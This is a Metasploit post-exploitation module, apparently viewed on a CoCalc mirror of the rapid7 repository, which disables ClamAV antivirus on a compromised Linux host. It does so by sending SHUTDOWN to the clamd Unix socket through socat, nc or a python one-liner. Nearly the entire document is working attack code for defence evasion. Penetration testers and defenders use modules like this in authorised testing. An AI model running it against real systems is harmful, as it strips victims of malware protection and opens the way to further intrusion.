CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/manage/disable_clamav.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  Rank = ExcellentRanking

8
  include Msf::Post::File

9
  include Msf::Post::Unix

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Disable ClamAV',

16
        'Description' => %q{

17
          This module will write to the ClamAV Unix socket to shutoff ClamAV.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'DLL_Cool_J'

22
        ],

23
        'Platform' => [ 'linux' ],

24
        'SessionTypes' => [ 'meterpreter', 'shell' ],

25
        'Notes' => {

26
          'Stability' => [SERVICE_RESOURCE_LOSS],

27
          'Reliability' => [],

28
          'SideEffects' => [IOC_IN_LOGS]

29
        }

30
      )

31
    )

32
    register_options(

33
      [

34
        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),

35
        OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])

36
      ], self.class

37
    )

38
  end

39


40
  def run

41
    clamav_socket = datastore['CLAMAV_UNIX_SOCKET']

42
    cmd = datastore['COMMAND']

43


44
    if command_exists?('socat')

45
      print_good('socat exists')

46
      payload = "echo #{cmd} | socat - UNIX-CONNECT:#{clamav_socket}"

47
    elsif command_exists?('nc')

48
      print_good('nc exists')

49
      payload = "echo #{cmd} | nc -U #{clamav_socket}"

50
    elsif command_exists?('python')

51
      print_good('python exists')

52
      payload = "python -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""

53
    elsif command_exists?('python3')

54
      print_good('python3 exists')

55
      payload = "python3 -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""

56
    else

57
      fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!')

58
    end

59


60
    print_status("Checking file path #{clamav_socket} exists and is writable... ")

61
    print_bad('File does NOT exist or is not writable!') unless writable?(clamav_socket.to_s)

62
    print_good('File does exist and is writable!')

63
    print_good("Sending #{cmd}...")

64
    cmd_exec(payload)

65
  end

66
end

67


68